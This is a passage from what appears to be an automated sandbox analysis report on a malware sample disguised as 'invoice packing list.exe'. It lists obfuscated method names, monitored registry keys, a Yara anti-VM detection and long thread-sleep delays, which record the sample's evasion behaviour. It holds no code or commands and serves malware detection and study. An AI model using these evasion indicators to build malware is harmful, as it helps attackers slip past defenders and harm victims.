          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, Ud9QceN44K6Mw96FA1.csHigh entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, dD0BVxQqWcHNl3EOSs.csHigh entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, u65AEyzuvTaiVXsVTe.csHigh entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, FR0QiRIfhQaCC6ovHDv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, DS7BW0DFsb2tsRZAL8.csHigh entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.csHigh entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, sw2xZcJUwW7c0RvEVa.csHigh entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, XZ1it8U9PwDjdP7gXi.csHigh entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, zSiLhA2jy2oTvl6tbs.csHigh entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, UCgCHyZk2L11G2cjVp.csHigh entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, khg9ERRp3gHWVtiDLt.csHigh entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, RGlWmwje7LtvZq0b4l.csHigh entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, DvPB97fbEbk6oqcSaO.csHigh entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, j1gFGoXv2S6nIHvGHT.csHigh entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, a284xdII5yLBtRLk15W.csHigh entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, xoB6256fyHcwTsGSFY.csHigh entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, Q95703IO9rX5a8MElxl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.csHigh entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, zeC4y8qqdFGihnfe7F.csHigh entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, WW3P9p5VnJt57g3Q1E.csHigh entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, EyMo88rs0Ara9Txj0w.csHigh entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, Ud9QceN44K6Mw96FA1.csHigh entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, dD0BVxQqWcHNl3EOSs.csHigh entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, u65AEyzuvTaiVXsVTe.csHigh entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, FR0QiRIfhQaCC6ovHDv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, DS7BW0DFsb2tsRZAL8.csHigh entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.csHigh entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, sw2xZcJUwW7c0RvEVa.csHigh entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
          Source: C:\Users\user\Desktop\invoice packing list.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 7780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 8780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 9C90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: AC90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: BC90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598441Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598323Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598182Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598074Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeWindow / User API: threadDelayed 8216Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeWindow / User API: threadDelayed 1606Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 4012Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6980Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -26747778906878833s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6160Thread sleep count: 8216 > 30Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6160Thread sleep count: 1606 > 30Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599438s >= -30000sJump to behavior
